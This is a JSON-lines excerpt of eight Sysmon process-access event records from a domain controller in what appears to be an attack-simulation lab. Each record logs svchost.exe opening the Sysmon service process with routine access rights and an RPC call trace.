{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1320,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1321,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1322,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1323,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1324,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1325,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1326,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1327,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
